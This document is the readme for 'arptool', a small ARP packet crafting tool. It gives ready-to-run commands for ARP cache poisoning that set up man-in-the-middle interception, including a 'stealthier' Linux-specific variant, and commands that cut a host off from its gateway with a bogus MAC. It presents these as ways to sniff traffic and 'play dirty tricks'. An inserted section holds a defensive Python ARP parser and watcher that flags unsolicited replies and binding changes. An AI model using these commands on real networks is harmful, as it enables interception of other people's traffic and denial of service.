arptool - simple arp tool
version 0.0.1
readme file


what for?
with arptool you can send simple arp packets, in this case just who-has and
arp-reply packets. this can be used together in a script to set up man-in-the-
middle arp relaying or as a denial-of-service attack. you can also reroute lan
traffic which would otherwise not be visible to your machine, so you can sniff
it and play dirty tricks.


usage

usage: arptool <device> <type> <dstip> <dstmac> <srcip> <srcmac>

<device>                target device to send arp packet on
<type>                  type of arp packet to send
        tell    arp reply
        bcast   arp who-has ask
<dstip>/<dstmac>        the destination pair
<srcip>/<srcmac>        the source pair


examples

reroute traffic between ip1 (10.0.0.1) with mac1 (00:10:00:00:00:01) and ip2
(10.0.0.2) with mac2 (00:10:00:00:00:02), our mac is 00:e8:00:01:01:01:

  ./arptool eth0 tell 10.0.0.1 00:10:00:00:00:01 10.0.0.2 00:e8:00:01:01:01
  ./arptool eth0 tell 10.0.0.2 00:10:00:00:00:02 10.0.0.1 00:e8:00:01:01:01

if you have ip forwarding enabled in your kernel you should now be able to
watch any traffic between 10.0.0.1 and 10.0.0.2, even in a switched
environment.

if your target is running a linux kernel you may want to go for a small
variation (doesn't work on *bsd or windows), which is slightly stealthier and
less well known:

  ./arptool eth0 bcast 10.0.0.1 00:10:00:00:00:01 10.0.0.2 00:e8:00:01:01:01
  ./arptool eth0 bcast 10.0.0.2 00:10:00:00:00:02 10.0.0.1 00:e8:00:01:01:01

this sends who-has requests that carry our ip/mac as the sender pair. a linux
kernel enters that sender information into its arp cache.

just remember you have to do this every few seconds to keep the entry in the
arp cache.
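both tricks above leave a trace on the wire that a monitor on the same segment can pick up: the tell variant is a reply nobody asked for, and both variants change the mac an ip is bound to. the following is an added example written for this readme (not part of arptool, and the frames are constructed locally, nothing is sent): a small arp parser plus a watcher that learns bindings from replies and from who-has requests, the way the readme says a linux kernel does, and raises an alert for unsolicited replies and for binding changes.

```python
import struct
from collections import namedtuple
ARP_REQUEST, ARP_REPLY = 1, 2
Arp = namedtuple("Arp", "op sha spa tha tpa")  # sender/target hardware and protocol addresses

def parse_arp(frame):
    """Parse an Ethernet frame carrying ARP for IPv4 over Ethernet (htype 1, ptype 0x0800)."""
    if len(frame) < 42 or frame[12:14] != b"\x08\x06" or frame[14:20] != b"\x00\x01\x08\x00\x06\x04":
        raise ValueError("not an ethernet/ipv4 ARP frame")
    op, sha, spa, tha, tpa = struct.unpack("!H6s4s6s4s", frame[20:42])
    mac = lambda b: ":".join(f"{x:02x}" for x in b)
    return Arp(op, mac(sha), ".".join(map(str, spa)), mac(tha), ".".join(map(str, tpa)))

class ArpWatch:
    """Learn ip->mac from the sender fields of replies AND who-has requests (the
    linux behaviour the readme relies on) and report the anomalies both tricks cause."""
    def __init__(self):
        self.table = {}       # ip -> mac as first seen
        self.pending = set()  # (asker ip, asked ip) of who-has requests not yet answered
    def observe(self, pkt):
        alerts = []
        if pkt.op == ARP_REQUEST:
            self.pending.add((pkt.spa, pkt.tpa))
        elif pkt.op == ARP_REPLY:
            if (pkt.tpa, pkt.spa) not in self.pending:  # nobody asked for this answer
                alerts.append(f"unsolicited reply: {pkt.spa} is-at {pkt.sha} to {pkt.tpa}")
            self.pending.discard((pkt.tpa, pkt.spa))
        known = self.table.setdefault(pkt.spa, pkt.sha)
        if known != pkt.sha:
            alerts.append(f"binding change: {pkt.spa} was {known}, now {pkt.sha}")
        return alerts

def sample_frame(op, sha, spa, tha, tpa):
    """Constructed test input only: encode one ARP frame as bytes (nothing is sent)."""
    mac = lambda s: bytes.fromhex(s.replace(":", ""))
    ip = lambda s: bytes(int(x) for x in s.split("."))
    dst = b"\xff" * 6 if op == ARP_REQUEST else mac(tha)
    return (dst + mac(sha) + b"\x08\x06" + struct.pack("!HHBBH", 1, 0x0800, 6, 4, op)
            + mac(sha) + ip(spa) + mac(tha) + ip(tpa))

def run_demo():
    """A normal who-has/reply exchange, then the readme's 'tell' and 'bcast' frames."""
    mac1, mac2, ours = "00:10:00:00:00:01", "00:10:00:00:00:02", "00:e8:00:01:01:01"
    frames = [sample_frame(ARP_REQUEST, mac1, "10.0.0.1", "00:00:00:00:00:00", "10.0.0.2"),
              sample_frame(ARP_REPLY, mac2, "10.0.0.2", mac1, "10.0.0.1"),
              sample_frame(ARP_REPLY, ours, "10.0.0.2", mac1, "10.0.0.1"),   # tell 10.0.0.1
              sample_frame(ARP_REQUEST, ours, "10.0.0.1", mac2, "10.0.0.2")]  # bcast, learnt by 10.0.0.2
    watch = ArpWatch()
    return [a for f in frames for a in watch.observe(parse_arp(f))]
```

the first two frames are a clean exchange and raise nothing; the tell frame raises two alerts (unsolicited reply, binding change for 10.0.0.2) and the bcast frame one (binding change for 10.0.0.1), which is the signal a real monitor would want to feed from a pcap or a raw socket.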

another example: you want to deny ip1 (10.0.0.1) with mac1 (00:10:00:00:00:01)
any traffic to the external gateway (10.0.0.254).

  ./arptool eth0 tell 10.0.0.1 00:10:00:00:00:01 10.0.0.254 8e:81:82:83:84:84

where 8e:81:82:83:84:84 is just a bogus mac address which should not exist.
another trick is to enable forwarding but to set up a static host route; with
this you can selectively replace any computer, even an external one which
doesn't have a mac on the lan at all.


ps: i hope i can improve this stuff soon, so you won't have to manually gather
    the mac addresses.

greets for this one fly out to rookie for neat theoretical and practical
(hehe) discussions about arp. you rock!

cheers,
scut of teso


